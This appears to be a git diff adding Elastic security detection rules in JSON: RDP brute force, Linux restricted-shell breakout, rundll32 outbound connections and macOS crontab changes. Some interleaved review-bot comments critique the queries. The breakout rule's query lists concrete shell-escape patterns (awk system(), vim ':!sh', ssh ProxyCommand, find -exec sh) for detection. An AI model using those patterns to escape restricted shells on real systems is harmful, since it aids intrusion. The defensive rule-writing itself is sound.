"reference": "https://attack.mitre.org/techniques/T1218/014/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 107 + }, + "id": "51ce96fb-9e52-4dad-b0ba-99b54440fc9a_107", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json new file mode 100644 index 00000000000..ff183541784 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux RDP Brute Force Attack Detected", + "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + 
"subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 6 + }, + "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_6", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json new file mode 100644 index 00000000000..f3065e58c2b --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7.json 
@@ -0,0 +1,99 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "An RDP (Remote Desktop Protocol) brute force attack involves an attacker repeatedly attempting various username and password combinations to gain unauthorized access to a remote computer via RDP, and if successful, the potential impact can include unauthorized control over the compromised system, data theft, or the ability to launch further attacks within the network, jeopardizing the security and confidentiality of the targeted system and potentially compromising the entire network infrastructure. This rule identifies multiple consecutive authentication failures targeting a specific user account within a short time interval, followed by a successful authentication.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Successful Linux RDP Brute Force Attack Detected", + "query": "sequence by host.id, related.user with maxspan=5s\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"failure\"] with runs=10\n [authentication where host.os.type == \"linux\" and event.action == \"authenticated\" and\n auditd.data.terminal : \"*rdp*\" and event.outcome == \"success\"] | tail 1\n", + "related_integrations": [ + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.terminal", + "type": "unknown" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "related.user", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"521fbe5c-a78d-4b6b-a323-f978b0e4c4c0", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Auditbeat\n- Auditd Manager\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n### Auditd Manager Integration Setup\nThe Auditd Manager Integration receives audit events from the Linux Audit Framework which is a part of the Linux kernel.\nAuditd Manager provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. 
With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system.\n\n#### The following steps should be executed in order to add the Elastic Agent System integration \"auditd_manager\" on a Linux System:\n- Go to the Kibana home page and click \u201cAdd integrations\u201d.\n- In the query bar, search for \u201cAuditd Manager\u201d and select the integration to see more details about it.\n- Click \u201cAdd Auditd Manager\u201d.\n- Configure the integration name and optionally add a description.\n- Review optional and advanced settings accordingly.\n- Add the newly installed \u201cauditd manager\u201d to an existing or a new agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n- Click \u201cSave and Continue\u201d.\n- For more details on the integration refer to the [helper guide](https://docs.elastic.co/integrations/auditd_manager).\n\n#### Rule Specific Setup Note\nAuditd Manager subscribes to the kernel and receives events as they occur without any additional configuration.\nHowever, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from.\n- For this detection rule no additional audit rules are required to be added to the integration.\n", + "severity": "medium", + "tags": [ + "Data Source: Auditd Manager", + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1110", + "name": "Brute Force", + "reference": "https://attack.mitre.org/techniques/T1110/", + 
"subtechnique": [ + { + "id": "T1110.001", + "name": "Password Guessing", + "reference": "https://attack.mitre.org/techniques/T1110/001/" + }, + { + "id": "T1110.003", + "name": "Password Spraying", + "reference": "https://attack.mitre.org/techniques/T1110/003/" + } + ] + } + ] + } + ], + "type": "eql", + "version": 7 + }, + "id": "521fbe5c-a78d-4b6b-a323-f978b0e4c4c0_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json new file mode 100644 index 00000000000..e54a44481fe --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/52376a86-ee86-4967-97ae-1a05f55816f0_112.json 
@@ -0,0 +1,138 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the abuse of a Linux binary to break out of a restricted shell or environment by spawning an interactive system shell. The activity of spawning a shell from a binary is not common behavior for a user or system administrator, and may indicate an attempt to evade detection, increase capabilities or enhance the stability of an adversary.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Linux Restricted Shell Breakout via Linux Binary(s)", + "note": "## Triage and analysis\n\n### Investigating Shell Evasion via Linux Utilities\nDetection alerts from this rule indicate that a Linux utility has been abused to breakout of restricted shells or\nenvironments by spawning an interactive system shell.\nHere are some possible avenues of investigation:\n- Examine the entry point to the host and user in action via the Analyse View.\n - Identify the session entry leader and session user\n- Examine the contents of session leading to the abuse via the Session View.\n - Examine the command execution pattern in the session, which may lead to suspricous activities\n- Examine the execution of commands in the spawned shell.\n - Identify imment threat to the system from the executed commands\n - Take necessary incident response actions to contain any malicious behviour caused via this execution.\n\n### Related rules\n\n- A malicious spawned shell can execute any of the possible MITTRE ATT&CK vectors mainly to impair defences.\n- Hence its adviced to enable defence evasion and privilige escalation rules accordingly in your environment\n\n### Response and remediation\n\nInitiate the incident response process based on the outcome of the triage.\n\n- If the triage releaved suspicious netwrok activity from the malicious spawned shell,\n - Isolate the involved host to prevent further post-compromise behavior.\n- 
If the triage identified malware execution via the maliciously spawned shell,\n - Search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- If the triage revelaed defence evasion for imparing defenses\n - Isolate the involved host to prevent further post-compromise behavior.\n - Identified the disabled security guard components on the host and take necessary steps in renebaling the same.\n - If any tools have been disbaled / uninstalled or config tampered work towards reenabling the same.\n- If the triage revelaed addition of persistence mechanism exploit like auto start scripts\n - Isolate further login to the systems that can initae auto start scripts.\n - Identify the auto start scripts and disable and remove the same from the systems\n- If the triage revealed data crawling or data export via remote copy\n - Investigate credential exposure on systems compromised / used / decoded by the attacker during the data crawling\n - Intiate compromised credential deactivation and credential rotation process for all exposed crednetials.\n - Investiagte if any IPR data was accessed during the data crawling and take appropriate actions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and\n(\n /* launching shell from capsh */\n (process.name == \"capsh\" and process.args == \"--\") or\n \n /* launching shells from unusual 
parents or parent+arg combos */\n (process.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\") and (\n (process.parent.name : \"*awk\" and process.parent.args : \"BEGIN {system(*)}\") or\n (process.parent.name == \"git\" and process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or \n process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") and not process.name == \"ssh\" ) or\n (process.parent.name : (\"byebug\", \"ftp\", \"strace\", \"zip\", \"tar\") and \n (\n process.parent.args : \"BEGIN {system(*)}\" or\n (process.parent.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\") or process.args : (\"*PAGER*\", \"!*sh\", \"exec *sh\")) or\n (\n (process.parent.args : \"exec=*sh\" or (process.parent.args : \"-I\" and process.parent.args : \"*sh\")) or\n (process.args : \"exec=*sh\" or (process.args : \"-I\" and process.args : \"*sh\"))\n )\n )\n ) or\n \n /* shells specified in parent args */\n /* nice rule is broken in 8.2 */\n (process.parent.args : \"*sh\" and\n (\n (process.parent.name == \"nice\") or\n (process.parent.name == \"cpulimit\" and process.parent.args == \"-f\") or\n (process.parent.name == \"find\" and process.parent.args == \".\" and process.parent.args == \"-exec\" and \n process.parent.args == \";\" and process.parent.args : \"/bin/*sh\") or\n (process.parent.name == \"flock\" and process.parent.args == \"-u\" and process.parent.args == \"/\")\n )\n )\n )) or\n\n /* shells specified in args */\n (process.args : \"*sh\" and (\n (process.parent.name == \"crash\" and process.parent.args == \"-h\") or\n (process.name == \"sensible-pager\" and process.parent.name in (\"apt\", \"apt-get\") and process.parent.args == \"changelog\")\n /* scope to include more sensible-pager invoked shells with different parent process to reduce noise and remove false positives */\n \n )) or\n (process.name == \"busybox\" and event.action == \"exec\" and process.args_count == 2 and process.args : \"*sh\" and not \n process.executable : 
\"/var/lib/docker/overlay2/*/merged/bin/busybox\" and not (process.parent.args == \"init\" and\n process.parent.args == \"runc\") and not process.parent.args in (\"ls-remote\", \"push\", \"fetch\") and not process.parent.name == \"mkinitramfs\") or\n (process.name == \"env\" and process.args_count == 2 and process.args : \"*sh\") or\n (process.parent.name in (\"vi\", \"vim\") and process.parent.args == \"-c\" and process.parent.args : \":!*sh\") or\n (process.parent.name in (\"c89\", \"c99\", \"gcc\") and process.parent.args : \"*sh,-s\" and process.parent.args == \"-wrapper\") or\n (process.parent.name == \"expect\" and process.parent.args == \"-c\" and process.parent.args : \"spawn *sh;interact\") or\n (process.parent.name == \"mysql\" and process.parent.args == \"-e\" and process.parent.args : \"\\\\!*sh\") or\n (process.parent.name == \"ssh\" and process.parent.args == \"-o\" and process.parent.args : \"ProxyCommand=;*sh 0<&2 1>&2\")\n)\n", + "references": [ + "https://gtfobins.github.io/gtfobins/apt/", + "https://gtfobins.github.io/gtfobins/apt-get/", + "https://gtfobins.github.io/gtfobins/nawk/", + "https://gtfobins.github.io/gtfobins/mawk/", + "https://gtfobins.github.io/gtfobins/awk/", + "https://gtfobins.github.io/gtfobins/gawk/", + "https://gtfobins.github.io/gtfobins/busybox/", + "https://gtfobins.github.io/gtfobins/c89/", + "https://gtfobins.github.io/gtfobins/c99/", + "https://gtfobins.github.io/gtfobins/cpulimit/", + "https://gtfobins.github.io/gtfobins/crash/", + "https://gtfobins.github.io/gtfobins/env/", + "https://gtfobins.github.io/gtfobins/expect/", + "https://gtfobins.github.io/gtfobins/find/", + "https://gtfobins.github.io/gtfobins/flock/", + "https://gtfobins.github.io/gtfobins/gcc/", + "https://gtfobins.github.io/gtfobins/mysql/", + "https://gtfobins.github.io/gtfobins/nice/", + "https://gtfobins.github.io/gtfobins/ssh/", + "https://gtfobins.github.io/gtfobins/vi/", + "https://gtfobins.github.io/gtfobins/vim/", + 
"https://gtfobins.github.io/gtfobins/capsh/", + "https://gtfobins.github.io/gtfobins/byebug/", + "https://gtfobins.github.io/gtfobins/git/", + "https://gtfobins.github.io/gtfobins/ftp/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "52376a86-ee86-4967-97ae-1a05f55816f0", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": 
"https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1059", + "name": "Command and Scripting Interpreter", + "reference": "https://attack.mitre.org/techniques/T1059/", + "subtechnique": [ + { + "id": "T1059.004", + "name": "Unix Shell", + "reference": "https://attack.mitre.org/techniques/T1059/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 112 + }, + "id": "52376a86-ee86-4967-97ae-1a05f55816f0_112", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json new file mode 100644 index 00000000000..bebdda8462f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/52aaab7b-b51c-441a-89ce-4387b3aea886_108.json 
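Review bot: In the `query` string the `git` branch reads `(process.parent.name == "git" and process.parent.args : (...) or process.args : (...) and not process.name == "ssh")`; since `and` binds tighter than `or` in EQL, the `process.args` clause is not scoped to a `git` parent at all, and `not process.name == "ssh"` is always true inside a branch already limited to `process.name in ("bash", ...)`. If the intent is to match either argument list only under `git`, the clause should read `(process.parent.name == "git" and (process.parent.args : ("*PAGER*", "!*sh", "exec *sh") or process.args : ("*PAGER*", "!*sh", "exec *sh")))`. The `tags` list carries `Data Source: Elastic Endgame` while `index` contains only `logs-endpoint.events.*`, so one of the two should be aligned. The `note` investigation guide also has a number of spelling errors (`suspricous`, `imment`, `MITTRE`, `netwrok`, `revelaed`, `crednetials`, among others) and the `setup` text links to `fleet/8.10/agent-policy.html` where the other links use `current`; both deserve a pass before this text reaches analysts. Presumably these exports originate upstream, so the corrections belong there rather than in this package.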
@@ -0,0 +1,133 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies unusual instances of rundll32.exe making outbound network connections. This may indicate adversarial Command and Control activity.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Unusual Network Connection via RunDLL32", + "note": "## Triage and analysis\n\n### Investigating Unusual Network Connection via RunDLL32\n\nRunDLL32 is a built-in Windows utility and also a vital component used by the operating system itself. The functionality provided by RunDLL32 to execute Dynamic Link Libraries (DLLs) is widely abused by attackers, because it makes it hard to differentiate malicious activity from normal operations.\n\nThis rule looks for external network connections established using RunDLL32 when the utility is being executed with no arguments, which can potentially indicate command and control activity.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the target host that RunDLL32 is communicating with.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n- Identify the target computer and its role in the IT environment.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. 
Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved hosts to prevent further post-compromise behavior.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Review the privileges assigned to the user to ensure that the least privilege principle is being followed.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"windows\" and event.type == \"start\" and process.name : \"rundll32.exe\" and process.args_count == 1]\n [network where host.os.type == \"windows\" and process.name : \"rundll32.exe\" and\n not cidrmatch(destination.ip, \"10.0.0.0/8\", \"127.0.0.0/8\", \"169.254.0.0/16\", \"172.16.0.0/12\", \"192.0.0.0/24\",\n \"192.0.0.0/29\", \"192.0.0.8/32\", \"192.0.0.9/32\", \"192.0.0.10/32\", \"192.0.0.170/32\", \"192.0.0.171/32\",\n \"192.0.2.0/24\", \"192.31.196.0/24\", \"192.52.193.0/24\", \"192.168.0.0/16\", \"192.88.99.0/24\", \"224.0.0.0/4\",\n \"100.64.0.0/10\", \"192.175.48.0/24\",\"198.18.0.0/15\", \"198.51.100.0/24\", \"203.0.113.0/24\", \"240.0.0.0/4\", \"::1\",\n \"FE80::/10\", \"FF00::/8\")]\n", + "references": [ + "https://www.iana.org/assignments/iana-ipv4-special-registry/iana-ipv4-special-registry.xhtml", + 
"https://redcanary.com/threat-detection-report/techniques/rundll32/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "destination.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args_count", + "type": "long" + }, + { + "ecs": true, + "name": "process.entity_id", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "52aaab7b-b51c-441a-89ce-4387b3aea886", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1218", + "name": "System Binary Proxy Execution", + "reference": "https://attack.mitre.org/techniques/T1218/", + "subtechnique": [ + { + "id": "T1218.011", + "name": "Rundll32", + "reference": "https://attack.mitre.org/techniques/T1218/011/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1071", + "name": "Application Layer Protocol", + "reference": "https://attack.mitre.org/techniques/T1071/", + "subtechnique": [ + { + "id": "T1071.001", + "name": "Web Protocols", + "reference": "https://attack.mitre.org/techniques/T1071/001/" + } + ] + } + ] + } + 
], + "type": "eql", + "version": 108 + }, + "id": "52aaab7b-b51c-441a-89ce-4387b3aea886_108", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json new file mode 100644 index 00000000000..22d06ceee6e --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/530178da-92ea-43ce-94c2-8877a826783d_106.json 
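Review bot: The `cidrmatch` exclusion list in the second sequence stage omits `0.0.0.0/8` and the IPv6 unique-local range `fc00::/7`, so a connection to an unroutable "this network" address or to a ULA-addressed internal host is classified as external and raises a medium alert; adding `"0.0.0.0/8"` and `"fc00::/7"` to the list (and `"255.255.255.255/32"` if limited broadcast should be ignored) would bring it in line with the IANA special-purpose registry the `references` entry cites. Several entries (`192.0.0.0/29` and the `192.0.0.8/32` … `192.0.0.171/32` singles) are already covered by `192.0.0.0/24` and can be dropped to keep the list readable. The first stage keys on `process.args_count == 1`, which is the no-argument case the `note` describes; a one-line comment in the query, `/* args_count == 1: rundll32.exe launched with no arguments, since args[0] is the executable itself */`, would make that intent explicit to the next maintainer.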
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies attempts to create or modify a crontab via a process that is not crontab (i.e python, osascript, etc.). This activity should not be highly prevalent and could indicate the use of cron as a persistence mechanism by a threat actor.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Suspicious CronTab Creation or Modification", + "query": "file where host.os.type == \"macos\" and event.type != \"deletion\" and process.name != null and\n file.path : \"/private/var/at/tabs/*\" and not process.executable == \"/usr/bin/crontab\"\n", + "references": [ + "https://taomm.org/PDFs/vol1/CH%200x02%20Persistence.pdf", + "https://theevilbit.github.io/beyond/beyond_0004/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, 